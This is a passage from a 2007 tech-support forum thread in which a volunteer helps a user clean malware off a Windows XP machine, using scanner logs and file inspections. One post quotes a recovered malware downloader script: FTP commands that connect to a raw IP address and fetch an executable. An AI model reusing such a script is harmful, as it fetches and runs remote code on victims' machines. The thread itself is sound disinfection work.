O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxsrvc.dll
O23 - Service: AVG Anti-Spyware Guard - Anti-Malware Development a.s. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Sygate Personal Firewall (SmcService) - Sygate Technologies, Inc. - C:\Program Files\Sygate\SPF\smc.exe
O23 - Service: SymWMI Service (SymWSC) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe
O23 - Service: WAN Miniport (ATW) Service (WANMiniportService) - America Online, Inc. - C:\WINDOWS\wanmpsvc.exe


-- HijackThis Fixed Entries (C:\PROGRA~1\HIJACK~1\backups\) --------------------

backup-20070216-054427-128 O4 - HKLM\..\Run: [kdmmcvs] C:\WINDOWS\System32\gmonstml.exe
backup-20070216-054427-175 O4 - HKLM\..\Run: [nvcdllx] C:\WINDOWS\System32\cstatvmq.exe
backup-20070216-054427-288 O4 - HKCU\..\Run: [jmlcv4m] C:\WINDOWS\System32\mgcplwin.exe
backup-20070216-054427-352 O4 - HKCU\..\Run: [ymmsddlop] C:\WINDOWS\system32\vssmnptc.exe
backup-20070216-054427-370 O4 - HKLM\..\Run: [DllRunning] rundll32.exe "C:\WINDOWS\System32\iiydacla.dll",setvm
backup-20070216-054427-399 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
backup-20070216-054427-431 O4 - HKLM\..\Run: [Error Nuker] C:\Program Files\Error Nuker\bin\ErrorNuker.exe autostart
backup-20070216-054427-438 O4 - HKLM\..\Run: [lmjvservc] fxsugwhh.exe
backup-20070216-054427-566 O4 - HKLM\..\Run: [{7B-BE-E8-8B-ZN}] C:\windows\system32\nodsregj.exe SKY001
backup-20070216-054427-608 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = about:blank
backup-20070216-054427-619 R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = file:///c:/secure32.html
backup-20070216-054427-624 O4 - HKCU\..\Run: [WinInit] "C:\DOCUME~1\Duane\LOCALS~1\Temp\162015.exe "
backup-20070216-054427-645 O4 - HKCU\..\Run: [cwingllib] C:\WINDOWS\system32\atllsimm.exe
backup-20070216-054427-684 O4 - HKLM\..\Run: [ExploreUpdSched] C:\WINDOWS\System32\qwinpoeb.exe SKY001
backup-20070216-054427-698 O4 - HKLM\..\Run: [ijciiqc.dll] C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\ijciiqc.dll,okbblr
backup-20070216-054427-702 R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
backup-20070216-054427-794 R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = about:blank
backup-20070216-054427-897 O4 - HKLM\..\Run: [AutoSys] C:\WINDOWS\System32\autosys.exe
backup-20070216-054427-929 O4 - HKCU\..\Run: [mdwinllm3] C:\WINDOWS\System32\sscmsslv.exe
backup-20070216-054428-100 O23 - Service: Microsoft Apache for Windows (Windows Apache Service) - Unknown owner - C:\WINDOWS\wpablin.exe (file missing)
backup-20070216-054428-254 O4 - HKCU\..\Run: [ncsmmlg] C:\WINDOWS\System32\ctlmems.exe
backup-20070216-054428-293 O8 - Extra context menu item: &Search - http://edits.mywebsearch.com/toolbar...p=ZUxdm080YYUS
backup-20070216-054428-361 O4 - HKCU\..\Run: [csmhtop] C:\WINDOWS\System32\sdmmlmn.exe
backup-20070216-054428-368 O4 - HKCU\..\Run: [kdmmcvs] C:\WINDOWS\System32\gmonstml.exe
backup-20070216-054428-388 O23 - Service: WINS Client (RpcPatch) - Unknown owner - C:\WINDOWS\System32\wins\DLLHOST.EXE (file missing)
backup-20070216-054428-416 O23 - Service: Network Connections Sharing (RpcTftpd) - Unknown owner - C:\WINDOWS\System32\wins\svchost.exe (file missing)
backup-20070216-054428-503 O4 - HKCU\..\Run: [lsmdwinr] C:\WINDOWS\System32\vstldmem.exe
backup-20070216-054428-517 O16 - DPF: {2B96D5CC-C5B5-49A5-A69D-CC0A30F9028C} (MiniBugTransporterX Class) - http://wdownload.weatherbug.com/mini...ansporter.cab?
backup-20070216-054428-621 O4 - HKCU\..\Run: [winksddm] C:\WINDOWS\System32\jvmmods.exe
backup-20070216-054428-670 O4 - HKCU\..\Run: [lvcdmsys] C:\WINDOWS\System32\dbbsrcc.exe
backup-20070216-054428-692 O23 - Service: Windows Host Services (DLLHOST32) - Unknown owner - C:\WINDOWS\system\dllhost.exe (file missing)
backup-20070216-054428-782 O4 - HKCU\..\Run: [ddsysmns] C:\WINDOWS\System32\scmdcon.exe
backup-20070216-054428-923 O4 - HKCU\..\Run: [nvcdllx] C:\WINDOWS\System32\cstatvmq.exe
backup-20070216-054428-976 O23 - Service: Microsoft authenticate service (MsaSvc) - Unknown owner - C:\WINDOWS\System32\msasvc.exe (file missing)
backup-20070216-054428-981 O4 - HKCU\..\Run: [gdxapimn] C:\WINDOWS\System32\jgdepgc.exe
backup-20070217-094852-237 O4 - HKLM\..\Run: [MyWebSearch Email Plugin] C:\PROGRA~1\MYWEBS~2\bar\1.bin\mwsoemon.exe
backup-20070217-094852-412 O4 - HKLM\..\Run: [DeluxeCommunications] C:\Program Files\DeluxeCommunications\Dxc.exe
backup-20070217-094852-445 R3 - URLSearchHook: (no name) - {A8BD6820-6ED7-423E-9558-2D1486B0FEEA} - C:\Program Files\DeluxeCommunications\DxcBho.dll
backup-20070217-094852-538 O4 - HKLM\..\Run: [DllRunning] rundll32.exe "C:\WINDOWS\System32\vpgvkoua.dll",setvm
backup-20070217-095341-714 O23 - Service: TCP and UDP Supp0rt - Unknown owner - C:\WINDOWS\System32\tccpip.exe (file missing)
backup-20070217-095341-913 O23 - Service: Microsoft Apache for Windows (Windows Apache Service) - Unknown owner - C:\WINDOWS\wpablin.exe (file missing)
backup-20070217-095504-553 R3 - URLSearchHook: (no name) - {A8BD6820-6ED7-423E-9558-2D1486B0FEEA} - C:\Program Files\DeluxeCommunications\DxcBho.dll
backup-20070217-095630-934 O4 - HKLM\..\Run: [DeluxeCommunications] C:\Program Files\DeluxeCommunications\Dxc.exe
backup-20070217-095814-485 O4 - HKLM\..\Run: [DeluxeCommunications] C:\Program Files\DeluxeCommunications\Dxc.exe
backup-20070217-095845-703 O4 - HKLM\..\Run: [DllRunning] rundll32.exe "C:\WINDOWS\System32\etlcsjcc.dll",setvm
backup-20070217-105355-336 O4 - HKLM\..\Run: [DeluxeCommunications] C:\Program Files\DeluxeCommunications\Dxc.exe
backup-20070217-105355-357 R3 - URLSearchHook: (no name) - {A8BD6820-6ED7-423E-9558-2D1486B0FEEA} - C:\Program Files\DeluxeCommunications\DxcBho.dll
backup-20070217-110354-366 O23 - Service: Microsoft Apache for Windows (Windows Apache Service) - Unknown owner - C:\WINDOWS\wpablin.exe (file missing)
backup-20070217-114409-294 R3 - URLSearchHook: (no name) - {A8BD6820-6ED7-423E-9558-2D1486B0FEEA} - C:\Program Files\DeluxeCommunications\DxcBho.dll
backup-20070217-114545-903 O4 - HKLM\..\Run: [DeluxeCommunications] C:\Program Files\DeluxeCommunications\Dxc.exe
backup-20070217-114616-441 O4 - HKLM\..\Run: [DeluxeCommunications] C:\Program Files\DeluxeCommunications\Dxc.exe
backup-20070220-231401-253 O4 - Global Startup: .protected
backup-20070220-231401-880 O4 - Startup: .protected
backup-20070220-231401-900 O4 - HKCU\..\Run: [DeluxeCommunications] C:\Program Files\DeluxeCommunications\Dxc.exe
backup-20070220-231411-468 O23 - Service: Microsoft Apache for Windows (Windows Apache Service) - Unknown owner - C:\WINDOWS\wpablin.exe (file missing)
backup-20070220-231411-583 O23 - Service: Windows Host Services (DLLHOST32) - Unknown owner - C:\WINDOWS\system\dllhost.exe (file missing)
backup-20070220-231440-277 O4 - Startup: .protected
backup-20070220-231440-539 O4 - Global Startup: .protected
backup-20070221-190232-390 R3 - URLSearchHook: (no name) - {A8BD6820-6ED7-423E-9558-2D1486B0FEEA} - C:\Program Files\DeluxeCommunications\DxcBho.dll
backup-20070221-190232-606 O4 - Global Startup: .protected
backup-20070221-190232-680 O4 - Startup: .protected
backup-20070221-190232-900 O4 - HKCU\..\Run: [DeluxeCommunications] C:\Program Files\DeluxeCommunications\Dxc.exe
backup-20070221-190517-258 O23 - Service: Windows Host Services (DLLHOST32) - Unknown owner - C:\WINDOWS\system\dllhost.exe (file missing)
backup-20070221-190517-645 O23 - Service: Microsoft Apache for Windows (Windows Apache Service) - Unknown owner - C:\WINDOWS\wpablin.exe (file missing)
backup-20070221-190939-975 R3 - URLSearchHook: (no name) - {A8BD6820-6ED7-423E-9558-2D1486B0FEEA} - C:\Program Files\DeluxeCommunications\DxcBho.dll
backup-20070223-224512-185 O16 - DPF: {15589FA1-C456-11CE-BF01-000000000000} - http://www.errornuker.com/products/e...rInstaller.exe
backup-20070223-224512-192 O4 - Global Startup: .protected
backup-20070223-224512-482 O4 - HKLM\..\Run: [nvcdllx] C:\WINDOWS\System32\cstatvmq.exe
backup-20070223-224512-515 R3 - URLSearchHook: (no name) - {A8BD6820-6ED7-423E-9558-2D1486B0FEEA} - (no file)
backup-20070223-224512-523 O4 - Startup: .protected
backup-20070223-224512-588 O4 - HKCU\..\Run: [kdmmcvs] C:\WINDOWS\System32\gmonstml.exe
backup-20070223-224512-766 O4 - HKLM\..\Run: [kdmmcvs] C:\WINDOWS\System32\gmonstml.exe
backup-20070223-224512-839 O4 - HKLM\..\Run: [DllRunning] rundll32.exe "C:\WINDOWS\System32\lpuotxaf.dll",setvm
backup-20070223-224512-855 O4 - HKCU\..\Run: [nvcdllx] C:\WINDOWS\System32\cstatvmq.exe
backup-20070223-224856-783 O4 - Startup: .protected
backup-20070223-224856-791 O4 - Global Startup: .protected
backup-20070223-225649-352 O4 - HKLM\..\Run: [DllRunning] rundll32.exe "C:\WINDOWS\System32\arbcakff.dll",setvm
backup-20070223-230505-157 O4 - Global Startup: .protected
backup-20070223-230505-646 O4 - Startup: .protected
backup-20070223-230834-571 O4 - Startup: .protected
backup-20070223-230834-966 O4 - Global Startup: .protected
backup-20070224-121833-356 O4 - Startup: .protected
backup-20070224-121834-543 O4 - Global Startup: .protected
backup-20070228-200450-511 O4 - HKLM\..\Run: [DllRunning] rundll32.exe "C:\WINDOWS\System32\ebacdlso.dll",setvm
backup-20070301-200021-179 O2 - BHO: 0 - {A87A5C44-882B-42BC-27A5-06511D2BA675} - C:\Program Files\Common Files\sagu292.dll (file missing)
backup-20070301-200021-201 O2 - BHO: (no name) - {067BE456-B710-4015-84FF-E09B52ACE092} - C:\WINDOWS\System32\pmkjj.dll (file missing)
backup-20070301-200021-208 O4 - HKLM\..\Run: [DllRunning] rundll32.exe "C:\WINDOWS\System32\kxrwuojr.dll",setvm
backup-20070301-200021-574 O2 - BHO: (no name) - {C3581462-AD4C-43AF-A8A7-AFEFEBA11B44} - C:\WINDOWS\system32\byxwttt.dll
backup-20070301-200021-742 O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - (no file)
backup-20070301-200021-877 O20 - Winlogon Notify: byxyvwv - byxyvwv.dll (file missing)
backup-20070301-200021-920 O2 - BHO: (no name) - {E03C740E-BB24-4d3c-B92A-6F84DE1DD99C} - C:\WINDOWS\System32\xbiehfer.dll (file missing)
backup-20070301-200021-993 O2 - BHO: (no name) - {37EB498E-7800-A96A-AED9-045FF6ECB283} - C:\WINDOWS\System32\ceamvdb.dll (file missing)
backup-20070301-200022-224 O20 - Winlogon Notify: szr_dll - C:\WINDOWS\szr_dll.dll
backup-20070308-230025-273 O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - (no file)
backup-20070308-230025-385 O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\
backup-20070308-230025-425 O4 - HKLM\..\Run: [DllRunning] rundll32.exe "C:\WINDOWS\System32\uejowmvf.dll",setvm
backup-20070308-230025-533 O2 - BHO: 0 - {A87A5C44-882B-42BC-27A5-06511D2BA675} - (no file)
backup-20070308-230025-624 O20 - Winlogon Notify: awvtq - C:\WINDOWS\System32\awvtq.dll (file missing)
backup-20070308-230025-627 O4 - HKLM\..\Run: [DSS] C:\WINDOWS\BBSTORE\DSS\DSSAGENT.EXE
backup-20070308-230025-753 O2 - BHO: (no name) - {37EB498E-7800-A96A-AED9-045FF6ECB283} - (no file)
backup-20070308-230025-774 O2 - BHO: (no name) - {067BE456-B710-4015-84FF-E09B52ACE092} - (no file)
backup-20070308-230025-928 O2 - BHO: (no name) - {DEB17D59-1D80-4627-AA07-E01BB37A8399} - C:\WINDOWS\System32\awvtq.dll (file missing)

-- File Associations -----------------------------------------------------------

All associations okay.


-- Drivers: 0-Boot, 1-System, 2-Auto, 3-Demand, 4-Disabled ---------------------

R0 drvmcdb - c:\windows\system32\drivers\drvmcdb.sys
R0 Teefer (Teefer for NT) - c:\windows\system32\drivers\teefer.sys
R1 BANTExt (Belarc SMBios Access) - c:\windows\system32\drivers\bantext.sys
R1 wpsdrvnt - c:\windows\system32\drivers\wpsdrvnt.sys
R2 mdmxsdk - c:\windows\system32\drivers\mdmxsdk.sys
R2 wg6n (SyGate for NT, wg6n) - c:\windows\system32\drivers\wg6n.sys
R3 HSF_DP - c:\windows\system32\drivers\hsf_dp.sys
R3 HSFHWBS2 - c:\windows\system32\drivers\hsfhwbs2.sys
R3 ialm - c:\windows\system32\drivers\ialmnt5.sys
R3 pcouffin (VSO Software pcouffin) - c:\windows\system32\drivers\pcouffin.sys
R3 wanatw (WAN Miniport (ATW)) - c:\windows\system32\drivers\wanatw4.sys
R3 winachsf - c:\windows\system32\drivers\hsf_cnxt.sys

S2 Ca536av (DV 4100M(Video)) - c:\windows\system32\drivers\ca536av.sys
S2 ntio256 (Input and output operations) - c:\windows\system32\ntio256.sys (file missing)
S2 wg3n (SyGate for NT, wg3n) - c:\windows\system32\drivers\wg3n.sys
S2 wg4n (SyGate for NT, wg4n) - c:\windows\system32\drivers\wg4n.sys
S2 wg5n (SyGate for NT, wg5n) - c:\windows\system32\drivers\wg5n.sys
S3 USBCamera (DV 4100M(Still)) - c:\windows\system32\drivers\bulk536.sys


-- Services: 0-Boot, 1-System, 2-Auto, 3-Demand, 4-Disabled --------------------

R2 uploadmgr (Upload Manager) - c:\windows\system32\svchost.exe -k netsvcs


-- Files created between 2007-02-21 and 2007-03-21 -----------------------------

2007-03-20 20:18:18 0 d-------- C:\avenger
2007-03-19 21:14:12 0 d--h----- C:\WINDOWS\PIF
2007-03-18 09:51:51 77 --a------ C:\delete.reg
2007-03-13 20:51:18 136 --a------ C:\WINDOWS\System32\dgjun.bat
2007-03-12 18:20:25 491768 --a------ C:\ie6setup.exe
2007-03-11 22:17:35 0 d-------- C:\WINDOWS\System32\ActiveScan<ACTIVE~1>
2007-03-11 09:25:11 0 d-------- C:\Program Files\Java
2007-03-11 09:25:11 0 d-------- C:\Program Files\Common Files\Java
2007-03-11 09:24:21 0 d-------- C:\Documents and Settings\Duane\Application Data\Sun
2007-03-10 11:31:19 0 d-------- C:\Rustbfix
2007-03-08 19:33:08 49152 --a------ C:\Documents and Settings\Duane\vfind.exe
2007-03-08 19:33:08 79360 --a------ C:\Documents and Settings\Duane\swxcacls.exe
2007-03-08 19:33:08 123904 --a------ C:\Documents and Settings\Duane\swsc.exe
2007-03-08 19:33:08 140800 --a------ C:\Documents and Settings\Duane\swreg.exe
2007-03-08 19:33:08 8192 --a------ C:\Documents and Settings\Duane\RestartIt.exe<RESTAR~1.EXE>
2007-03-08 19:33:08 6914 --a------ C:\Documents and Settings\Duane\Qoo.bat
2007-03-08 19:33:08 971 --a------ C:\Documents and Settings\Duane\Purity.bat
2007-03-08 19:33:08 39184 --a------ C:\Documents and Settings\Duane\Ntrights.exe
2007-03-08 19:33:08 5074 --a------ C:\Documents and Settings\Duane\NTPBack.exe
2007-03-08 19:33:08 42887 --a------ C:\Documents and Settings\Duane\ntp.exe
2007-03-08 19:33:08 26112 --a------ C:\Documents and Settings\Duane\nircmd.exe
2007-03-08 19:33:08 38400 --a------ C:\Documents and Settings\Duane\moveex.exe
2007-03-08 19:33:08 2304 --a------ C:\Documents and Settings\Duane\Look2Me.bat
2007-03-08 19:33:08 117379 --a------ C:\Documents and Settings\Duane\LIST-C.bat
2007-03-08 19:33:08 181776 --a------ C:\Documents and Settings\Duane\handle.exe
2007-03-08 19:33:08 73728 --a------ C:\Documents and Settings\Duane\FDSV.EXE
2007-03-08 19:33:08 51200 --a------ C:\Documents and Settings\Duane\dumphive.exe
2007-03-08 19:33:08 319415 --a------ C:\Documents and Settings\Duane\Creg.reg
2007-03-08 19:33:08 28672 --a------ C:\Documents and Settings\Duane\catchme.exe
2007-02-24 21:33:14 53248 --a------ C:\WINDOWS\System32\Process.exe
2007-02-24 21:33:08 0 d-------- C:\SmitfraudFix<SMITFR~1>
2007-02-21 21:42:30 129 --a------ C:\fix.bat


-- Find3M Report ---------------------------------------------------------------

2007-03-21 21:15:45 0 d-------- C:\Program Files\Hijack This<HIJACK~1>
2007-03-21 20:38:09 0 d-------- C:\Program Files\Picasa2
2007-03-21 20:36:13 0 d-------- C:\Program Files\Messenger<MESSEN~1>
2007-03-21 20:31:05 0 d-------- C:\Program Files\iTunes
2007-03-21 20:29:54 0 d-------- C:\Program Files\Google
2007-03-21 20:27:24 0 d-------- C:\Program Files\BigFix
2007-03-08 19:47:09 0 d-------- C:\Program Files\Common Files\Symantec Shared<SYMANT~1>
2007-02-25 10:48:59 0 d---s---- C:\Documents and Settings\Duane\Application Data\Microsoft<MICROS~1>
2007-02-24 22:08:44 3762 --a------ C:\WINDOWS\System32\tmp.reg
2007-02-24 10:40:37 0 d-------- C:\Documents and Settings\Duane\Application Data\AVG7
2007-02-21 18:24:56 0 d-------- C:\Program Files\backups
2007-02-20 21:14:12 0 d-------- C:\Program Files\Shockwave.com<SHOCKW~1.COM>
2007-02-13 21:29:11 0 d-------- C:\Program Files\Common Files\Sandlot Shared<SANDLO~1>
2007-02-10 20:00:13 14201 --a------ C:\Program Files\hijackthis.log<HIJACK~1.LOG>
2007-01-28 22:13:42 0 d-------- C:\Program Files\LG Software Innovations<LGSOFT~1>
2007-01-28 22:05:20 0 d-------- C:\Program Files\CloneDVD
2007-01-28 21:28:17 14 --a------ C:\WINDOWS\System32\systeminfo3.dll<SYSTEM~1.DLL>
2007-01-28 21:26:56 0 d-------- C:\Documents and Settings\Duane\Application Data\Vso
2007-01-28 21:26:55 34 --a------ C:\Documents and Settings\Duane\Application Data\pcouffin.log
2007-01-28 21:26:41 47360 --a------ C:\Documents and Settings\Duane\Application Data\pcouffin.sys
2007-01-28 21:26:41 1144 --a------ C:\Documents and Settings\Duane\Application Data\pcouffin.inf
2007-01-28 21:26:41 7176 --a------ C:\Documents and Settings\Duane\Application Data\pcouffin.cat
2007-01-28 21:26:41 81920 --a------ C:\Documents and Settings\Duane\Application Data\ezpinst.exe
2007-01-28 10:10:09 0 --a------ C:\WINDOWS\System32\3D64363D
2007-01-27 17:25:38 0 --a------ C:\WINDOWS\System32\DF21552E
2007-01-24 18:26:41 32 --a------ C:\WINDOWS\System32\14981
2007-01-24 18:19:43 0 --a------ C:\WINDOWS\System32\7AAECFBC
2007-01-21 15:19:32 0 d-------- C:\Documents and Settings\Duane\Application Data\Lavasoft
2007-01-21 15:19:15 0 d-------- C:\Program Files\Lavasoft
2007-01-21 15:08:15 14612 --a------ C:\Program Files\CWSHREDDER.EXE-2D092FD4.pf<CWSHRE~1.PF>
2007-01-21 15:03:52 532480 --a------ C:\Program Files\cwshredder.exe<CWSHRE~1.EXE>
2007-01-13 14:32:20 0 --a------ C:\WINDOWS\System32\00BDDB65
2007-01-13 09:32:29 2 --a------ C:\337100427<337100~1>
2007-01-12 18:19:57 0 --a------ C:\WINDOWS\System32\vb2en16.dll
2007-01-12 18:19:50 1235 --a------ C:\WINDOWS\System32\openopenopen<OPENOP~2>
2007-01-12 18:19:49 6 --a------ C:\WINDOWS\System32\openopenopenopen<OPENOP~1>
2007-01-12 18:19:34 0 --a------ C:\WINDOWS\System32\99239519
2007-01-11 18:27:03 0 --a------ C:\WINDOWS\System32\9ACA5390
2007-01-11 18:27:03 0 --a------ C:\WINDOWS\System32\86C67981
2007-01-11 16:35:52 1 --a------ C:\WINDOWS\System32\kr_done1
2007-01-11 16:35:33 12800 --a------ C:\WINDOWS\System32\svchost.exe
2007-01-11 16:33:19 0 --a------ C:\WINDOWS\System32\3718845C
2007-01-08 16:00:23 0 --a------ C:\WINDOWS\System32\9947BC72
2007-01-07 18:21:40 1 --a------ C:\WINDOWS\System32\ps.dat
2007-01-07 18:21:40 1 --a------ C:\WINDOWS\System32\cookie.dat
2007-01-07 13:16:52 25600 --a------ C:\WINDOWS\System32\helper.dll
2007-01-05 10:40:00 0 --a------ C:\WINDOWS\System32\9147A101
2007-01-04 22:35:41 10660 --a------ C:\WINDOWS\mozver.dat
2007-01-03 20:49:11 5037072 --a------ C:\Program Files\spybotsd14.exe<SPYBOT~1.EXE>
2007-01-01 12:02:40 507 --a------ C:\WINDOWS\EReg077.dat
2006-12-25 16:33:11 23066 --a------ C:\Program Files\plainoldfavorites-0.5.6-fx-windows.xpi<PLAINO~1.XPI>


-- Registry Dump ---------------------------------------------------------------


[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run]
"MSMSGS"="\"C:\\Program Files\\Messenger\\msmsgs.exe\" /background"
"Microsoft Works Update Detection"="c:\\Program Files\\Microsoft Works\\WkDetect.exe"
"swg"="C:\\Program Files\\Google\\GoogleToolbarNotifier\\1.2.1128.5462\\GoogleToolbarNotifier.exe"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run]
"TkBellExe"="\"C:\\Program Files\\Common Files\\Real\\Update_OB\\realsched.exe\" -osboot"
"SSC_UserPrompt"="C:\\Program Files\\Common Files\\Symantec Shared\\Security Center\\UsrPrmpt.exe"
"Ulead AutoDetector"="C:\\Program Files\\Ulead Systems\\Ulead Photo Explorer 8.0 SE Basic\\Monitor.exe"
"HPDJ Taskbar Utility"="C:\\WINDOWS\\System32\\spool\\drivers\\w32x86\\3\\hpztsb10.exe"
"HP Component Manager"="\"C:\\Program Files\\HP\\hpcoretech\\hpcmpmgr.exe\""
"HP Software Update"="\"C:\\Program Files\\Hewlett-Packard\\HP Software Update\\HPWuSchd2.exe\""
"QuickTime Task"="\"C:\\Program Files\\QuickTime\\qttask.exe\" -atboottime"
"Picasa Media Detector"="C:\\Program Files\\Picasa2\\PicasaMediaDetector.exe"
"iTunesHelper"="\"C:\\Program Files\\iTunes\\iTunesHelper.exe\""
"AVG7_CC"="C:\\PROGRA~1\\Grisoft\\AVG7\\avgcc.exe /STARTUP"
"OFFICEKB"="C:\\Program Files\\Micro Innovations\\Keyboard\\kbdap32a.EXE"
"FLMOFFICE4DMOUSE"="C:\\Program Files\\Micro Innovations\\Mouse\\mouse32a.exe"
"PC Pitstop Optimize Scheduler"="C:\\Program Files\\PCPitstop\\Optimize\\PCPOptimize.exe -boot"
"SmcService"="C:\\PROGRA~1\\Sygate\\SPF\\smc.exe -startgui"
"SunJavaUpdateSched"="\"C:\\Program Files\\Java\\jre1.6.0\\bin\\jusched.exe\""

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents]

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\IMAIL]
"Installed"="1"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MAPI]
"Installed"="1"
"NoChange"="1"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MSFS]
"Installed"="1"


[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shellexecutehooks]
"{57B86673-276A-48B2-BAE7-C6DBB3020EB8}"="AVG Anti-Spyware 7.5"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"="msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll"

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Svchost]
LocalService REG_MULTI_SZ Alerter\0WebClient\0LmHosts\0RemoteRegistry\0upnphost\0SSDPSRV\0\0
NetworkService REG_MULTI_SZ DnsCache\0\0
rpcss REG_MULTI_SZ RpcSs\0\0
imgsvc REG_MULTI_SZ StiSvc\0\0
termsvcs REG_MULTI_SZ TermService\0\0



-- End of Deckard's System Scanner: finished at 2007-03-21 at 21:16:10 ---------

Extra.txt is attached; I had to reboot since the dropdown froze up the system. Things work great after a reboot, but go downhill after running any of the fix programs.

Thanks
Attached: extra.txt (13.9 KB)
Old 03-22-2007, 12:00 AM #75
cul8rman (Registered User)
Join Date: Aug 2006
Location: Arizona
Posts: 134
OS: XP


Re: MS Windows XP will not load when connected to internet

I looked in C:\Windows\System32 for the Setup files and found one: Setup_02274.exe, with a modified date of 3/21/07.

I also found a file that had been deleted, "I", and here are its contents:

open 130.13.240.51 13194
user 1 1
get setup_02274.exe
quit


I also looked in openopenopen and openopenopenopen and it was a bunch of numbers and characters, but a lot of 3's and letters. I don't know if that is significant.

I have a bunch of files that are of type "File" in the system32 folder. I checked my other PC and that type of file does not exist there. I tried doing a screen shot and doing a word doc but the size was too big.

Just some things I see, if it helps.

Thanks
Old 03-22-2007, 08:26 AM #76
Ried (Assistant Manager, TSF Academy; Moderator/Analyst Security Team)
Join Date: Jan 2005
Location: Ohio
Posts: 26,557
OS: WinXP and Vista


Re: MS Windows XP will not load when connected to internet

Good work.

I'd like to gather a bit more information.

Go to Start>Run and type cmd then press Enter

Type the following instruction at the command prompt:

dir /s /a "C:\WINDOWS\System32\openopenopenopen" > c:\find.txt & start notepad c:\find.txt

You may find it easier to copy/paste it into the command prompt. If you're unfamiliar with this, you can paste into the command prompt by clicking on the upper left icon on the command shell window, referred to as the system menu, and along with Move, Size, and so on, you'll see a sub menu called Edit. Click on that, and you'll find Copy, Paste and other clipboard related commands. Here's a screen shot of what I mean:



A notepad file will open. Paste the contents of that file here.

------------------------------------------------

Also, please navigate to the following and tell me what's in these:

C:\337100427
C:\WINDOWS\System32\14981
C:\WINDOWS\System32\3D64363D
C:\WINDOWS\System32\7AAECFBC
C:\WINDOWS\System32\86C67981
C:\WINDOWS\System32\9147A101
C:\WINDOWS\System32\9947BC72
C:\WINDOWS\System32\9ACA5390
C:\WINDOWS\System32\DF21552E
__________________

Member of ASAP since 2005
Member of UNITE since 2006

"It is one life whether we spend it laughing or weeping." "Take the time to laugh--it is the music of the soul."
Old 03-22-2007, 11:23 AM #77
cul8rman (Registered User)
Join Date: Aug 2006
Location: Arizona
Posts: 134
OS: XP


Re: MS Windows XP will not load when connected to internet

Would you like the entries posted in a reply or attached in a notepad txt file? Do you want them listed altogether like

Contents of
C:\337100427
blah, blah,

C:\WINDOWS\System32\14981
blah, blah,

etc...

Just a bit of background: I did start out in my younger days as a computer science major but did not like the direction that was going, so I ended up getting an accounting degree. I am familiar with the logic behind how the computer works, but not at all with how Windows works and all the relationships it builds in the DLL files. I checked the directory on my working PC and figured that since that one is working fairly well, if something is not in that it should not be in the one you are helping me with. My working PC is up to date with SP2 but is running slow. I will work on that one later; this one is enough work for now.

I should be able to get this done late tonight but I have to help my son with a school project and he got tickets to the hockey game so I will be getting home late. I will get back to you as soon as I get the file contents exported to the method you choose.

Thanks for the help, I better get back to my job or I will have plenty time to take care of the ailing PC.
Old 03-22-2007, 11:41 AM #78
Ried (Assistant Manager, TSF Academy; Moderator/Analyst Security Team)
Join Date: Jan 2005
Location: Ohio
Posts: 26,557
OS: WinXP and Vista


Re: MS Windows XP will not load when connected to internet

Now I know why you're such a pleasure to work with on this.

However you see fit to provide the info is fine with me. Just do whatever is most convenient for you.

I too have a family to tend to and also have plans this evening, and may not be able to go over the info until tomorrow. Take your time--enjoy your time with your son--school projects are always fun.
Old 03-23-2007, 07:14 PM #79
cul8rman (Registered User)
Join Date: Aug 2006
Location: Arizona
Posts: 134
OS: XP


Re: MS Windows XP will not load when connected to internet

Doing everything in Notepad with Ctrl+A, Ctrl+C, then Ctrl+V is easy enough. Each file is separated by *******************; comments marked ***( ) are mine, not what was in the file.
-----------------------------------

Contents of Find.txt

Volume in drive C has no label.
Volume Serial Number is 1417-BE8B

Directory of C:\WINDOWS\System32

01/12/2007 06:19 PM 6 openopenopenopen
1 File(s) 6 bytes

Total Files Listed:
1 File(s) 6 bytes
0 Dir(s) 74,311,806,976 bytes free


Now for the "File" contents

****************************************
C:\337100427

ok

****************************************
C:\WINDOWS\System32\14981


*** (Appears to be a bunch of spaces)
****************************************
C:\WINDOWS\System32\3D64363D

*** (empty)
****************************************
C:\WINDOWS\System32\7AAECFBC

*** (empty)
****************************************
C:\WINDOWS\System32\86C67981

*** (empty)
****************************************
C:\WINDOWS\System32\9147A101

*** (empty)
****************************************
C:\WINDOWS\System32\9947BC72

